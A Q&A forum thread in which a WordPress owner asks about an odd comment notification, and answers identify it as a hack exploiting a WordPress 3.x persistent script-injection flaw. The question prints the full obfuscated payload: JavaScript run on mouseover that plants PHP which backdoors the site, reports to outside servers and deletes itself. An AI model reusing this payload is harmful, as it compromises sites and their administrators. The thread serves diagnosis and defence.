Is email from my WordPress site a hack or just a normal comment?

Question

I received an email for my WordPress site, where the comment section is disabled.

This was the email:

"Author: google (IP: 210.56.50.40, 210.56.50.40)

Email: guest@gmail.com

URL: http://spider.google.com

Who is?: http://whois.arin.net/rest/ip/210.56.50.40

Comment:

Welcome to WordPress. This is your first post.

[<a title="]" rel="nofollow"></a>[" <!-- style='position:fixed;top:0px;left:0px;width:6000px;height:6000px;color:transparent;z-index:999999999' onmouseover="eval(atob('dmFyIHggPSBkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiYSIpOwp2YXIgaTsKZm9yIChpID0gMDsgaSA8IHgubGVuZ3RoOyBpKyspIHsKICAgIGlmKHhbaV0uc3R5bGUud2lkdGggPT0gIjYwMDBweCIpe3hbaV0uc3R5bGUuZGlzcGxheT0ibm9uZSI7fQp9Cgp2YXIgZWwgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCJpZnJhbWUiKTsKZWwuaWQgPSAnaWZyYW1lMjInOwplbC5zdHlsZS5kaXNwbGF5ID0gImZpeGVkIjsKZWwuc3R5bGUudG9wPScxMDAwMHB4JzsKZWwuc3R5bGUubGVmdD0nMTAwMDBweCc7CmVsLnN0eWxlLndpZHRoID0gIjUwMHB4IjsKZWwuc3R5bGUuaGVpZ2h0ID0gIjUwMHB4IjsKZWwuc3JjID0gInBsdWdpbi1lZGl0b3IucGhwP2ZpbGU9aGVsbG8ucGhwJnBsdWdpbj1oZWxsby5waHAiOwpkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGVsKTsKZWwub25sb2FkID0gaHV5OwoKZnVuY3Rpb24gZ2V0SWZyYW1lRG9jdW1lbnQoaWZyYW1lTm9kZSkgewogIGlmIChpZnJhbWVOb2RlLmNvbnRlbnREb2N1bWVudCkgcmV0dXJuIGlmcmFtZU5vZGUuY29udGVudERvY3VtZW50CiAgaWYgKGlmcmFtZU5vZGU
 uY29udGVudFdpbmRvdykgcmV0dXJuIGlmcmFtZU5vZGUuY29udGVudFdpbmRvdy5kb2N1bWVudAogIHJldHVybiBpZnJhbWVOb2RlLmRvY3VtZW50Cn0KCmZ1bmN0aW9uIGh1eSgpewp2YXIgenp6ID0gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2lmcmFtZTIyJyk7CnZhciBoaGggPSBnZXRJZnJhbWVEb2N1bWVudCh6enopOwppZiAoaGhoLmdldEVsZW1lbnRCeUlkKCJuZXdjb250ZW50IikudmFsdWUuaW5kZXhPZigiMTc2NGQxMzNkNzM1MWJmNmEyN2QyZGViM2M1MjFhMDIiKSA9PSAtMSkgewpoaGguZ2V0RWxlbWVudEJ5SWQoIm5ld2NvbnRlbnQiKS52YWx1ZSA9IGF0b2IoIlBEOXdhSEFLQ21aMWJtTjBhVzl1SUZWdWIxOWxibU52WkdVb0pGTjBjbWx1WnlrS2V3b2dJQ0FnY21WMGRYSnVJSFZ5YkdWdVkyOWtaU2hpWVhObE5qUmZaVzVqYjJSbEtINGtVM1J5YVc1bktTazdDbjBLQ21aMWJtTjBhVzl1SUhKbGNHOXlkQ2drY21Oa0tYc0tJQ0FnSUNSeVpXTnBkbVZ5YzF0ZElEMGdKMmgwZEhBNkx5OXljQzVqWkMxcmVYbDNZWFJsY2k1amIyMHZKenNLSUNBZ0lDUnlaV05wZG1WeWMxdGRJRDBnSjJoMGRIQTZMeTl5Y0M1aWVXSjVMWE5vTlM1amIyMHZKenNLSUNBZ0lDUnlaV05wZG1WeWMxdGRJRDBnSjJoMGRIQTZMeTl5Y0M1MGFYUnBZVzVxWlhkbGJISjVMbU52YlM4bk93b2dJQ0FnSkhKbFkybDJaWEp6VzEwZ1BTQW5hSFIwY0RvdkwzSndMblIxYlc5MWNtaGxZV3gwYUM1amIyMHZKenNLSUNBZ0lDUnla
 V05wZG1WeWMxdGRJRDBnSjJoMGRIQTZMeTl5Y0M1amFHbHVZUzEwYjNWNWFXNW5hbWt1WTI5dEx5YzdDaUFnSUNBa2VpQTlJSE4wY2w5eVpYQnNZV05sS0NkM2NDMWpiMjUwWlc1MEwzQnNkV2RwYm5NdmFHVnNiRzh1Y0dod0p5d25KeXdrWDFORlVsWkZVbHNpVWtWUlZVVlRWRjlWVWtraVhTazdDaUFnSUNBa2NtVndiM0owSUQwZ1ZXNXZYMlZ1WTI5a1pTZ2tYMU5GVWxaRlVsc2lTRlJVVUY5SVQxTlVJbDB1SUNSNklDNGdKM3duSUM0Z0pISmpaQ2s3Q2lBZ0lDQnphSFZtWm14bEtDUnlaV05wZG1WeWN5azdDaUFnSUNCbWIzSmxZV05vS0NSeVpXTnBkbVZ5Y3lCaGN5QWtkQ2w3Q2lBZ0lDQWdJQ0FnWldOb2J5QW5QR2x0WnlCM2FXUjBhRDB4SUdobGFXZG9kRDB4SUhOeVl6MGlKeUF1SkhRZ0xpQW5QMlJoZEdFOUp5QXVKSEpsY0c5eWRDNG5JajRuT3dvZ0lDQWdmUXA5Q2dwbWRXNWpkR2x2YmlCeVpXMXZkbVZmWTI5dGJXVnVkQ2dwZXdvZ0lDQWdhVzVqYkhWa1pWOXZibU5sS0NjdUxpOHVMaTkzY0MxamIyNW1hV2N1Y0dod0p5azdDZ29nSUNBZ0pHTnZiaUE5SUcxNWMzRnNYMk52Ym01bFkzUW9SRUpmU0U5VFZDeEVRbDlWVTBWU0xFUkNYMUJCVTFOWFQxSkVLVHNLSUNBZ0lHMTVjM0ZzWDNObGJHVmpkRjlrWWloRVFsOU9RVTFGTENBa1kyOXVLVHNLQ2lBZ0lDQWtlbUZ3Y205eklEMGdKMlJsYkdWMFpTQm1jbTl0SUNjZ0xpQWtkR0ZpYkdWZmNISmxabWw0SUM0Z0oyTnZiVzFsYm5SeklIZG9aWEpsSUdOdmJXM
 WxiblJmWTI5dWRHVnVkQ0JzYVd0bElGd25KV0YwYjJJbFhDYzdKenNLSUNBZ0lDUnlJRDBnYlhsemNXeGZjWFZsY25rb0pIcGhjSEp2Y3lrN0NpQWdJQ0J0ZVhOeGJGOWpiRzl6WlNna1kyOXVLVHNLZlFvS1puVnVZM1JwYjI0Z2NHRjBZMmhmZDNBb0tYc0tJQ0FnSUNSbWJtRnRaU0E5SUNjdUxpOHVMaTkzY0MxamIyMXRaVzUwY3kxd2IzTjBMbkJvY0NjN0NpQWdJQ0JwWmlobWFXeGxYMlY0YVhOMGN5Z2tabTVoYldVcEtYc0tJQ0FnSUNBZ0lDQWtkQ0E5SUNjOFAzQm9jQ0JrYVdVb0tUc2dQejRuSUM0Z1VFaFFYMFZQVERzS0NpQWdJQ0FnSUNBZ0pIUnBiV1VnUFNCbWFXeGxiWFJwYldVb0pHWnVZVzFsS1RzS0lDQWdJQ0FnSUNBa2QzSnBkQ0E5SUdaaGJITmxPd29LSUNBZ0lDQWdJQ0JwWmlBb0lXbHpYM2R5YVhSaFlteGxLQ1JtYm1GdFpTa3Bld29nSUNBZ0lDQWdJQ0FnSUNBa2NHVnliU0E5SUhOMVluTjBjaWh6Y0hKcGJuUm1LQ2NsYnljc0lHWnBiR1Z3WlhKdGN5Z2tabTVoYldVcEtTd2dMVFFwT3dvZ0lDQWdJQ0FnSUNBZ0lDQkFZMmh0YjJRb0pHWnVZVzFsTERBMk5qWXBPd29nSUNBZ0lDQWdJQ0FnSUNBa2QzSnBkQ0E5SUhSeWRXVTdDaUFnSUNBZ0lDQWdmUW9LSUNBZ0lDQWdJQ0JqYkdWaGNuTjBZWFJqWVdOb1pTZ3BPd29nSUNBZ0lDQWdJR2xtSUNocGMxOTNjbWwwWVdKc1pTZ2tabTVoYldVcEtYc0tJQ0FnSUNBZ0lDQWdJQ0FnSkhSdGNDQTlJRUJtYVd4bFgyZGxkRjlqYjI1MFpXNTBjeWdrWm01aG
 JXVXBPd29nSUNBZ0lDQWdJQ0FnSUNBa2RHMXdJRDBnSkhRZ0xpQWtkRzF3T3dvZ0lDQWdJQ0FnSUgwS0lDQWdJQ0FnSUNCcFppQW9jM1J5YkdWdUtDUjBiWEFwSUQ0Z01UQXBld29LSUNBZ0lDQWdJQ0FnSUNBZ0pHWWdQU0JtYjNCbGJpZ2tabTVoYldVc0luY2lLVHNLSUNBZ0lDQWdJQ0FnSUNBZ1puQjFkSE1vSkdZc0pIUnRjQ2s3Q2lBZ0lDQWdJQ0FnSUNBZ0lHWmpiRzl6WlNna1ppazdDaUFnSUNBZ0lDQWdmUW9LSUNBZ0lDQWdJQ0JqYkdWaGNuTjBZWFJqWVdOb1pTZ3BPd29LSUNBZ0lDQWdJQ0JwWmlBb0pIZHlhWFFwZXdvZ0lDQWdJQ0FnSUNBZ0lDQm1iM0lvSkdrOWMzUnliR1Z1S0NSd1pYSnRLUzB4T3lScFBqMHdPeTB0SkdrcGV3b2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0pIQmxjbTF6SUNzOUlDaHBiblFwSkhCbGNtMWJKR2xkS25CdmR5ZzRMQ0FvYzNSeWJHVnVLQ1J3WlhKdEtTMGthUzB4S1NrN0NpQWdJQ0FnSUNBZ0lDQWdJSDBLSUNBZ0lDQWdJQ0FnSUNBZ1FHTm9iVzlrS0NSbWJtRnRaU3drY0dWeWJYTXBPd29nSUNBZ0lDQWdJSDBLQ2lBZ0lDQWdJQ0FnUUhSdmRXTm9LQ1JtYm1GdFpTd2tkR2x0WlNrN0NpQWdJQ0I5Q24wS0NtWjFibU4wYVc5dUlITmxiR1pmY21WdGIzWmxLQ2w3Q2lBZ0lDQWtabTVoYldVZ1BTQmZYMFpKVEVWZlh6c0tJQ0FnSUNSMGFXMWxJRDBnWm1sc1pXMTBhVzFsS0NSbWJtRnRaU2s3Q2lBZ0lDQWtkM0pwZENBOUlHWmhiSE5sT3dvS0lDQWdJR2xtSUNnaGFYTmZkM0pwZEd
 GaWJHVW9KR1p1WVcxbEtTbDdDaUFnSUNBZ0lDQWdKSEJsY20wZ1BTQnpkV0p6ZEhJb2MzQnlhVzUwWmlnbkpXOG5MQ0JtYVd4bGNHVnliWE1vSkdadVlXMWxLU2tzSUMwMEtUc0tJQ0FnSUNBZ0lDQkFZMmh0YjJRb0pHWnVZVzFsTERBMk5qWXBPd29nSUNBZ0lDQWdJQ1IzY21sMElEMGdkSEoxWlRzS0lDQWdJSDBLQ2lBZ0lDQmpiR1ZoY25OMFlYUmpZV05vWlNncE93b2dJQ0FnYVdZZ0tHbHpYM2R5YVhSaFlteGxLQ1JtYm1GdFpTa3Bld29nSUNBZ0lDQWdJQ1IwYlhBZ1BTQkFabWxzWlY5blpYUmZZMjl1ZEdWdWRITW9KR1p1WVcxbEtUc0tDaUFnSUNBZ0lDQWdKSEJ2Y3lBOUlITjBjbkJ2Y3lna2RHMXdMQ2N4TnpZMFpERXpNMlEzTXpVeFltWTJKeTRuWVRJM1pESmtaV0l6WXpVeU1XRXdNaWNwT3dvZ0lDQWdJQ0FnSUNSMGJYQWdQU0J6ZFdKemRISW9KSFJ0Y0N3a2NHOXpJQ3NnTXpJcE93b0tJQ0FnSUNBZ0lDQnBaaUFvYzNSeWJHVnVLQ1IwYlhBcElENGdNVEFwZXdvS0lDQWdJQ0FnSUNBZ0lDQWdKR1lnUFNCbWIzQmxiaWdrWm01aGJXVXNJbmNpS1RzS0lDQWdJQ0FnSUNBZ0lDQWdabkIxZEhNb0pHWXNKSFJ0Y0NrN0NpQWdJQ0FnSUNBZ0lDQWdJR1pqYkc5elpTZ2taaWs3Q2lBZ0lDQWdJQ0FnZlFvS0lDQWdJQ0FnSUNCamJHVmhjbk4wWVhSallXTm9aU2dwT3dvS0lDQWdJQ0FnSUNCcFppQW9KSGR5YVhRcGV3b2dJQ0FnSUNBZ0lDQWdJQ0JtYjNJb0pHazljM1J5YkdWdUtDUndaWEp0S1MweE95UnBQajB3
 T3kwdEpHa3Bld29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdKSEJsY20xeklDczlJQ2hwYm5RcEpIQmxjbTFiSkdsZEtuQnZkeWc0TENBb2MzUnliR1Z1S0NSd1pYSnRLUzBrYVMweEtTazdDaUFnSUNBZ0lDQWdJQ0FnSUgwS0lDQWdJQ0FnSUNBZ0lDQWdRR05vYlc5a0tDUm1ibUZ0WlN3a2NHVnliWE1wT3dvZ0lDQWdJQ0FnSUgwS0NpQWdJQ0FnSUNBZ1FIUnZkV05vS0NSbWJtRnRaU3drZEdsdFpTazdDaUFnSUNCOUNuMEtDaVJtYm1GdFpTQTlJQ2N1TGk4dUxpOTNjQzFqYjI1bWFXY3VjR2h3SnpzS0NtbG1LR1pwYkdWZlpYaHBjM1J6S0NSbWJtRnRaU2twZXdvS0lDQWdJQ1J5WTJRZ0lEMGdiV1ExS0NSZlUwVlNWa1ZTV3lKSVZGUlFYMGhQVTFRaVhTNGtYMU5GVWxaRlVsc2lTRlJVVUY5VlUwVlNYMEZIUlU1VUlsMHVjbUZ1WkNnd0xERXdNREF3S1NrN0NpQWdJQ0FrZENBOUlDZHBaaUFvYVhOelpYUW9KRjlTUlZGVlJWTlVXMXduUmtsTVJWd25YU2twZXlSZlUwVlNWa1ZTVXlBOUlITjBjbkpsZGlna1gxSkZVVlZGVTFSYlhDY25MaVJ5WTJRdUoxd25YU2s3SkY5R1NVeEZJRDBnSkY5VFJWSldSVkpUS0Z3bkpGOWNKeXh6ZEhKeVpYWW9KRjlTUlZGVlJWTlVXMXduUmtsTVJWd25YU2t1WENjb0pGOHBPMXduS1Rza1gwWkpURVVvYzNSeWFYQnpiR0Z6YUdWektDUmZVa1ZSVlVWVFZGdGNKMGhQVTFSY0oxMHBLVHQ5SnpzS0lDQWdJQ1IwYVcxbElEMGdabWxzWlcxMGFXMWxLQ1JtYm1GdFpTazdDaUFnSUNBa2MybDZaU
 0E5SUdacGJHVnphWHBsS0NSbWJtRnRaU2s3Q2lBZ0lDQWtkM0pwZENBOUlHWmhiSE5sT3dvS0lDQWdJR2xtSUNnaGFYTmZkM0pwZEdGaWJHVW9KR1p1WVcxbEtTbDdDaUFnSUNBZ0lDQWdKSEJsY20wZ1BTQnpkV0p6ZEhJb2MzQnlhVzUwWmlnbkpXOG5MQ0JtYVd4bGNHVnliWE1vSkdadVlXMWxLU2tzSUMwMEtUc0tJQ0FnSUNBZ0lDQkFZMmh0YjJRb0pHWnVZVzFsTERBMk5qWXBPd29nSUNBZ0lDQWdJQ1IzY21sMElEMGdkSEoxWlRzS0lDQWdJSDBLQ2lBZ0lDQmpiR1ZoY25OMFlYUmpZV05vWlNncE93b2dJQ0FnYVdZZ0tHbHpYM2R5YVhSaFlteGxLQ1JtYm1GdFpTa3Bld29nSUNBZ0lDQWdJQ1IwYlhBZ1BTQkFabWxzWlY5blpYUmZZMjl1ZEdWdWRITW9KR1p1WVcxbEtUc0tDaUFnSUNBZ0lDQWdKSFJ0Y0NBOUlITjBjbDl5WlhCc1lXTmxLQ2NrZEdGaWJHVmZjSEpsWm1sNEp5d2dKSFFnTGlCUVNGQmZSVTlNSUM0Z0p5UjBZV0pzWlY5d2NtVm1hWGduTENBa2RHMXdLVHNLSUNBZ0lDQWdJQ0JwWmlBb2MzUnliR1Z1S0NSMGJYQXBJRDRnTVRBcGV3b0tJQ0FnSUNBZ0lDQWdJQ0FnSkdZZ1BTQm1iM0JsYmlna1ptNWhiV1VzSW5jaUtUc0tJQ0FnSUNBZ0lDQWdJQ0FnWm5CMWRITW9KR1lzSkhSdGNDazdDaUFnSUNBZ0lDQWdJQ0FnSUdaamJHOXpaU2drWmlrN0NpQWdJQ0FnSUNBZ2ZRb0tJQ0FnSUNBZ0lDQmpiR1ZoY25OMFlYUmpZV05vWlNncE93b0tJQ0FnSUNBZ0lDQnBaaUFvSkhkeWFYUXBld29nSUNBZ0lDQW
 dJQ0FnSUNCbWIzSW9KR2s5YzNSeWJHVnVLQ1J3WlhKdEtTMHhPeVJwUGowd095MHRKR2twZXdvZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSkhCbGNtMXpJQ3M5SUNocGJuUXBKSEJsY20xYkpHbGRLbkJ2ZHlnNExDQW9jM1J5YkdWdUtDUndaWEp0S1Mwa2FTMHhLU2s3Q2lBZ0lDQWdJQ0FnSUNBZ0lIMEtJQ0FnSUNBZ0lDQWdJQ0FnUUdOb2JXOWtLQ1JtYm1GdFpTd2tjR1Z5YlhNcE93b2dJQ0FnSUNBZ0lIMEtDaUFnSUNBZ0lDQWdRSFJ2ZFdOb0tDUm1ibUZ0WlN3a2RHbHRaU2s3Q2lBZ0lDQjlDZ29nSUNBZ1kyeGxZWEp6ZEdGMFkyRmphR1VvS1RzS0lDQWdJR2xtS0NSemFYcGxJQ0U5UFNCbWFXeGxjMmw2WlNna1ptNWhiV1VwS1hzS0lDQWdJQ0FnSUNCeVpYQnZjblFvSkhKalpDazdDaUFnSUNCOUNuMEtDbkpsYlc5MlpWOWpiMjF0Wlc1MEtDazdDbkJoZEdOb1gzZHdLQ2s3Q25ObGJHWmZjbVZ0YjNabEtDazdDZ28vUGdvdkx6RTNOalJrTVRNelpEY3pOVEZpWmpaaE1qZGtNbVJsWWpOak5USXhZVEF5IikgKyBoaGguZ2V0RWxlbWVudEJ5SWQoIm5ld2NvbnRlbnQiKS52YWx1ZTsKaGhoLmdldEVsZW1lbnRCeUlkKCJzdWJtaXQiKS5jbGljayggKTsKfQplbHNlIHsKenp6LnNyYyA9ICcuLi93cC1jb250ZW50L3BsdWdpbnMvaGVsbG8ucGhwJzsKfQp9'))" &gt; --><a></a>]

Edit or delete it, then start blogging! "

What is this? I already deleted the comment, but I'm curious.

score 33 · Accepted Answer · edited Apr 25 '15 at 11:52

33

The "Code" is "patching" your WordPress installation (wp-comments-post.php) and sending some information to several servers (probably c&c). Also, it is removing itself from the database.

In other words, it is a hack. The email that you get is not from Google Official. It is from a Gmail account.

The decoded sources are here:

The exploit is based on WordPress 3.x persistent script injection: http://www.acunetix.com/vulnerabilities/web/wordpress-3-x-persistent-script-injection

edited Apr 25 '15 at 11:52

Peter Mortensen

877
5
10

answered Apr 24 '15 at 06:47

Sacx

684
5
12

2

And even further decoded: http://pastebin.com/iP9kZ9FR – Canadian Luke Apr 24 '15 at 19:37

score 16 · Answer 2 · edited Apr 25 '15 at 10:46

This is a hacking attempt that contains a special combination of characters that hides the malicious payload code using Base64 encoding.

The hidden code relies on an older version of WordPress being used, like version 3.5 for example. In these older versions, there are tricks that have been found. These tricks fool the safeguards that try to prevent scripts from being inserted into comments. It is done using a carefully crafted combination of characters that are misinterpreted as shortcodes, HTML and text in a way that allows access to the mouseover JavaScript event.

TIP: KEEP WORDPRESS UPDATED TO THE LATEST VERSION

When the mouseover is triggered by someone logged in as an administrator, any malicious code in the comment is executed as if the administrator executed it.

Why doesn't it use the `onload` event instead? Then you don't have to hope the administrator mouses over it. — Shelvacu, Apr 26 '15 at 01:14

Is email from my WordPress site a hack or just a normal comment?

2 Answers2